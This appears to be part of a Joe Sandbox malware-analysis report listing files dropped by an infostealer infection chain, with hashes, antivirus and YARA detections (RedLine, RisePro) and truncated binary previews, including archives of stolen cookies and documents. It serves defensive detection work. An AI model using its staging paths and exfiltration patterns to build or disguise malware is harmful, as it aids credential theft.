                                                                                                                                                                                                                                      Preview:@...e...........4....................................@..........@...............|.jdY\.H.s9.!..|4.......System.IO.Compression...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\RageMP131\RageMP131.exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2295808
                                                                                                                                                                                                                                      Entropy (8bit):7.951970323616638
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:neF1xn14/7RHK8MFoy7bh7bZzLhjDxdX4YgBAsU:+1xn1uhK8MFfB7dHhjdiYYAsU
                                                                                                                                                                                                                                      MD5:52257E8159B53FFB0F4E7CAE516DC107
                                                                                                                                                                                                                                      SHA1:45902F3469CCE67CD21F5904E87BD79A105C9DD5
                                                                                                                                                                                                                                      SHA-256:96A1AE1FA6F9AA36C26C2067939950D4567DEC2B2D7774F779AE199BE8B6BE16
                                                                                                                                                                                                                                      SHA-512:4BDAF2C82379B04A881660E05B121CAE79D300EA308C4D52304FF091F59800C9666630C35DAC247D37CB3478EC96D1388E04EC201AB067B2AD57FE6D4D10ACBA
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 51%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......P.....t...t...t._.w...t._.q...t._.s...t.......t...p...t...w...t...q.O.t._.p...t._.r...t._.u...t...u.4.t..|}...t..|t...t..|....t......t..|v...t.Rich..t.........PE..L......f...............'.4...2........X......P....@.......................... X.......#...@.........................TMW.L...m........P.....................DMW..............................LW.............................t...@................... . .@.......>..................@....rsrc.......P.......N..............@....idata ............................@... ..).. ......................@...ejwyeyni.@....>..2..................@...zoeuqxwb......X.......#.............@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2962432
                                                                                                                                                                                                                                      Entropy (8bit):6.559828656405516
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:hz28Myn3uFDrmGjA1n1Nrd/O9LunYp6VyiW9k2MYD:p28pn3yD6F7rd/OrYyiT2M
                                                                                                                                                                                                                                      MD5:F854143C49C4D2FA4CF73BAB97BA8D3A
                                                                                                                                                                                                                                      SHA1:62454E89CF9B2558347E2179F49FB4A56F4762EC
                                                                                                                                                                                                                                      SHA-256:8C8AFD00E6087780E4EE0A36F170BA06F13BA6D0C46CD2119B876E88D40C24E3
                                                                                                                                                                                                                                      SHA-512:C0454ED9124CD768B0E6C8090F5943F7828263B94D00138B8A208FD59E52C28329EA4CC466EE7830471D5F765CA5C9BFC1B48BDC7A5352BEC0A3E2C882C7B519
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 54%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.Y@...@...@....m..Q....m.......h..R....h..W....h..5....m..U....m..S...@........k..A....k1.A....k..A...Rich@...........PE..L...o..e..............................0...... ....@...........................1......Z-...@.................................V...j.............................0.............................X.0..................................................... . ............................@....rsrc...............................@....idata ............................@...wvtamnbw..*.......*.................@...jjaorssu......0.......-.............@....taggant.0....0.."....-.............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe:Zone.Identifier

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                      Size (bytes):26
                                                                                                                                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\1000054001\amert.exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1905152
                                                                                                                                                                                                                                      Entropy (8bit):7.9481732310150415
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:L2qVJL/mlsMQfk3gCcKpB057h3jI1Egbd:L2qVJrmTX3o3qEyd
                                                                                                                                                                                                                                      MD5:339020815B65530333BF2DDC928AC867
                                                                                                                                                                                                                                      SHA1:018F9C40EEFB58F90341F4EC7E58114972CB571F
                                                                                                                                                                                                                                      SHA-256:55563C7D134BE08E0EB9665CD34993FC90CBE3ED3A464A3D73C4072FED3FCE94
                                                                                                                                                                                                                                      SHA-512:7F176A32ACDDA71FC2DE67ECA2F27C173660F364AD4838C92369D02FB6FA60EBE57AE7A7A6273151F5BAC288C6551D3A58B08ACAAC9837D4BF265A2EC62D8598
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 43%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*R..n3.@n3.@n3.@5[.A`3.@5[.A.3.@.^.A|3.@.^.Az3.@.^.A.3.@5[.Az3.@5[.A}3.@n3.@.3.@.].Ao3.@.]u@o3.@.].Ao3.@Richn3.@........................PE..L......e.............................PK...........@...........................K.....Ja....@.................................Vp..j....`.......................;K..............................;K..................................................... . .P..........................@....rsrc........`......................@....idata .....p......................@... ..*.........................@...fbupybke.....@1.....................@...ejxqaids.....@K.....................@....taggant.0...PK.."..................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1166336
                                                                                                                                                                                                                                      Entropy (8bit):7.035580812234568
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24576:dqDEvCTbMWu7rQYlBQcBiT6rprG8au92+b+HdiJUX:dTvC/MTQYxsWR7au92+b+HoJU
                                                                                                                                                                                                                                      MD5:FB666C3917F960FD67DF0C2C8829D77F
                                                                                                                                                                                                                                      SHA1:028913A79AEC041DCE33A9A9EEEFE9BAAF6624F2
                                                                                                                                                                                                                                      SHA-256:726B25FA91F7D312C60B8673B382880E6DA2FDB03EF452BB907E22F349016028
                                                                                                                                                                                                                                      SHA-512:0500E7D211A3103DAC3C7E2D59307BEE69B5D3A05CD6E74CAD008DAFDA4C0DFDCE183912BEF02C818CA2658480987607736EA0214B15ECC6589A1D0F121E0BC6
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 33%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L.....!f..........".................w.............@..........................0............@...@.......@.....................d...|....@..|a.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...|a...@...b..................@..@.reloc...u.......v...V..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2295808
                                                                                                                                                                                                                                      Entropy (8bit):7.951970323616638
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:neF1xn14/7RHK8MFoy7bh7bZzLhjDxdX4YgBAsU:+1xn1uhK8MFfB7dHhjdiYYAsU
                                                                                                                                                                                                                                      MD5:52257E8159B53FFB0F4E7CAE516DC107
                                                                                                                                                                                                                                      SHA1:45902F3469CCE67CD21F5904E87BD79A105C9DD5
                                                                                                                                                                                                                                      SHA-256:96A1AE1FA6F9AA36C26C2067939950D4567DEC2B2D7774F779AE199BE8B6BE16
                                                                                                                                                                                                                                      SHA-512:4BDAF2C82379B04A881660E05B121CAE79D300EA308C4D52304FF091F59800C9666630C35DAC247D37CB3478EC96D1388E04EC201AB067B2AD57FE6D4D10ACBA
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 51%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......P.....t...t...t._.w...t._.q...t._.s...t.......t...p...t...w...t...q.O.t._.p...t._.r...t._.u...t...u.4.t..|}...t..|t...t..|....t......t..|v...t.Rich..t.........PE..L......f...............'.4...2........X......P....@.......................... X.......#...@.........................TMW.L...m........P.....................DMW..............................LW.............................t...@................... . .@.......>..................@....rsrc.......P.......N..............@....idata ............................@... ..).. ......................@...ejwyeyni.@....>..2..................@...zoeuqxwb......X.......#.............@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\1000187001\build12.exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):97792
                                                                                                                                                                                                                                      Entropy (8bit):5.961363779095596
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:iqsiPqBezlbG6jejoigIk43Ywzi0Zb78ivombfexv0ujXyyed2TteulgS6p4:AEmeZYk+zi0ZbYe1g0ujyzdX4
                                                                                                                                                                                                                                      MD5:4CFD179519524269052023E10DE6B866
                                                                                                                                                                                                                                      SHA1:1E92BA2322E341B979D53422CF0E044C4F3B1846
                                                                                                                                                                                                                                      SHA-256:A24A85156CE1A077403B4FFFE4C4E1C592DF412D6495FBA921771C59456B43AF
                                                                                                                                                                                                                                      SHA-512:6477C8DC2BA0F754716EE074BE131BC14A7D616C877210E0A3FBED7EA3FD132F2833518C52211757A8A875018061AE56FCDD7C30B8149EBE91C33763057ED8B9
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, Author: unknown
                                                                                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, Author: ditekSHen
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, Author: unknown
                                                                                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, Author: ditekSHen
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 77%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..t..........N.... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text...Ts... ...t.................. ..`.rsrc................v..............@..@.reloc...............|..............@..B................0.......H...........L.......C....................................................0.. .......s......~....%-.&~..........s....%.....(...+o.....8.....o............%........%.....(....s.....%.......%.....(....s.....%.......%.....(....s.....(....o.....8F.....(.....s......s,.......~....}....~.........s....(....o....}......{...........%.....(....s....o....,.......%.....(....s......+O..>.....%.....(....s....r...p~....(....(....o....-...{....(....+...{....(........(....:V......o........(....o

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\1000188001\build12.exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):97792
                                                                                                                                                                                                                                      Entropy (8bit):5.961363779095596
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:iqsiPqBezlbG6jejoigIk43Ywzi0Zb78ivombfexv0ujXyyed2TteulgS6p4:AEmeZYk+zi0ZbYe1g0ujyzdX4
                                                                                                                                                                                                                                      MD5:4CFD179519524269052023E10DE6B866
                                                                                                                                                                                                                                      SHA1:1E92BA2322E341B979D53422CF0E044C4F3B1846
                                                                                                                                                                                                                                      SHA-256:A24A85156CE1A077403B4FFFE4C4E1C592DF412D6495FBA921771C59456B43AF
                                                                                                                                                                                                                                      SHA-512:6477C8DC2BA0F754716EE074BE131BC14A7D616C877210E0A3FBED7EA3FD132F2833518C52211757A8A875018061AE56FCDD7C30B8149EBE91C33763057ED8B9
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 77%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..t..........N.... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text...Ts... ...t.................. ..`.rsrc................v..............@..@.reloc...............|..............@..B................0.......H...........L.......C....................................................0.. .......s......~....%-.&~..........s....%.....(...+o.....8.....o............%........%.....(....s.....%.......%.....(....s.....%.......%.....(....s.....(....o.....8F.....(.....s......s,.......~....}....~.........s....(....o....}......{...........%.....(....s....o....,.......%.....(....s......+O..>.....%.....(....s....r...p~....(....(....o....-...{....(....+...{....(........(....:V......o........(....o

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4621
                                                                                                                                                                                                                                      Entropy (8bit):7.776227586967732
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:P4hMhMb4hMhMJSybyRWmgkSFid8TVBUaNpHcux8WV73:P4r4Yybs83lJBUaN8WV73
                                                                                                                                                                                                                                      MD5:185589F499CED8BABF979510EC43B554
                                                                                                                                                                                                                                      SHA1:D573EAC608B44D180FC2215C650604025270CB6E
                                                                                                                                                                                                                                      SHA-256:9F6B4BC30BCF8E8444854DB0CA3A95E58F22953616778C513A98F5DED596E605
                                                                                                                                                                                                                                      SHA-512:214D55E6F9A10C1108CB59F257FE9325EBC89F484086431195270F10701D76353E0B334AE4F4A89D8EE90E54C0AC1FFAABBC8D00E3B93AA5249746091603DACF
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:PK..........DW...s............_Files_\BJZFPPWAPT.docx..I.@!.D......8..t....#.@.P.....~].....A786.g.....cf..K.^..0.].p....H..[..Tb..v........4C..?Nw....r.P....Z=...A8).....FF.vc.4....>Z.4.......D".?#l...R).+f.]K.=.4.].^E5W....[.*.......c.W.^}s..hn.3..O.jHj..R....|.......QAk.!.........F.....;.5.zi....<....'..O....9..Un.:.x>..6..n...Ch...c.IuT..F..#.8.r3..T-g&.S.\...Q.u!..A..g.......(...."..0}Y..`..V...mu...3w...(.ob...........x....@.f... ....0...l.'.....M.H..|i.9j.&Tq...s..*f.}.{I.o.%...GE....G.M"..NxV..S..j....,.`.1].h7..:....X...L[.>k...s.../....E...<t}..3.y4.n..R.G.v.J+....N3...._.K.w{.x.._}.lc...JT{...W`...W[).L/.....a.&U....ggNgA.w.V......(..?PK..........DW...s............_Files_\BJZFPPWAPT.xlsx..I.@!.D......8..t....#.@.P.....~].....A786.g.....cf..K.^..0.].p....H..[..Tb..v........4C..?Nw....r.P....Z=...A8).....FF.vc.4....>Z.4.......D".?#l...R).+f.]K.=.4.].^E5W....[.*.......c.W.^}s..hn.3..O.jHj..R....|.......QAk.!.........

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000054001\amert.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1905152
                                                                                                                                                                                                                                      Entropy (8bit):7.9481732310150415
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:L2qVJL/mlsMQfk3gCcKpB057h3jI1Egbd:L2qVJrmTX3o3qEyd
                                                                                                                                                                                                                                      MD5:339020815B65530333BF2DDC928AC867
                                                                                                                                                                                                                                      SHA1:018F9C40EEFB58F90341F4EC7E58114972CB571F
                                                                                                                                                                                                                                      SHA-256:55563C7D134BE08E0EB9665CD34993FC90CBE3ED3A464A3D73C4072FED3FCE94
                                                                                                                                                                                                                                      SHA-512:7F176A32ACDDA71FC2DE67ECA2F27C173660F364AD4838C92369D02FB6FA60EBE57AE7A7A6273151F5BAC288C6551D3A58B08ACAAC9837D4BF265A2EC62D8598
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 43%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*R..n3.@n3.@n3.@5[.A`3.@5[.A.3.@.^.A|3.@.^.Az3.@.^.A.3.@5[.Az3.@5[.A}3.@n3.@.3.@.].Ao3.@.]u@o3.@.].Ao3.@Richn3.@........................PE..L......e.............................PK...........@...........................K.....Ja....@.................................Vp..j....`.......................;K..............................;K..................................................... . .P..........................@....rsrc........`......................@....idata .....p......................@... ..*.........................@...fbupybke.....@1.....................@...ejxqaids.....@K.....................@....taggant.0...PK.."..................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\L6h0MKsU674R9uRTEifr_26.zip

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                      Size (bytes):3013
                                                                                                                                                                                                                                      Entropy (8bit):7.737963653983917
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:9g6aElnPtLe9jkXHLjj4zvn+ReEtcP4APVJCrG4wsDV0oNdHgogmszW0AWmGn3KC:XhijkXHL0n+Reisf4DDCoHNzQxAWr3KC
                                                                                                                                                                                                                                      MD5:EFB4F1B5314E7071FAF77E4FFE620625
                                                                                                                                                                                                                                      SHA1:B6972DE71D877F44A8627CEEC4A67EE983671796
                                                                                                                                                                                                                                      SHA-256:B096B7652FB5D41899FB414E4A1994B5663AB231F17D9BA5227DF1B6E7AA42FD
                                                                                                                                                                                                                                      SHA-512:083B633F204837AEAB3993869D9AD509B5F47D2AEA9C4FFEBBF1D07289E49E6B096BA1AE83CFD8548A0A33B0EEBC496D8CDB8408679BE3466B53C548D1E8703D
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: C:\Users\user\AppData\Local\Temp\L6h0MKsU674R9uRTEifr_26.zip, Author: Joe Security
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:PK...........X................Cookies\..PK...........X........$.......Cookies\Chrome_Default.txt....P...5.........`.L2J1l..\@.k.D..M'.t.k[Op...k...=..#T......?T...y..8.!(.h.>....o?.E.<.....EvWV.A....r,.4..|...u..<..4..T..w..1....._V..a..jZ....qcY..:.T.I.................l9.u..M.n.Q.W..Y3..".i...N.....;.n....t..].|-8|....W..v.....If&xA,}.`+5~.....Yx-..3..><9.]K.)..in.. .H=.@..FEH.a..<...0.j...t.J,=>6..z.k.x...N...f*.R.+.Y...~i.I..4.....p.Wm...5j.............*....tI..t.o..E....PK...........Xm...>...>.......information.txt.Y[O.J.~.........w.yZ.0C.Lv"..t`....,.;.v..j....1..#J.)....W....6.1YdQ.=..?MY.E>&......sT.1.R..dS...*.<...p..`...in...$4L..G.....9.-.d1R.2...EB.p.....o$D..IG...1cFA.Q@..K.....pp~.p.K..i$.B+.t...d...,.&i.G...L.w.X.....f..s&....<...(......x|.e."..N6...{.G..Yo.X......l.....6..I.<..............?.I.Ey....M...d[..4..1...4O..jL.?....&.OZ.g8....6%.w....a..'.7?..}..q=.....rk8.).6Y.\....%...A.^..G.j..`..G.......(.2yY....U.V...:Ok..oi.J..1.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_Files_\BJZFPPWAPT.docx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                      Entropy (8bit):4.704346314649071
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                                                                                                                                                                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                                                                                                                                                                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                                                                                                                                                                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                                                                                                                                                                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_Files_\BJZFPPWAPT.xlsx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1026
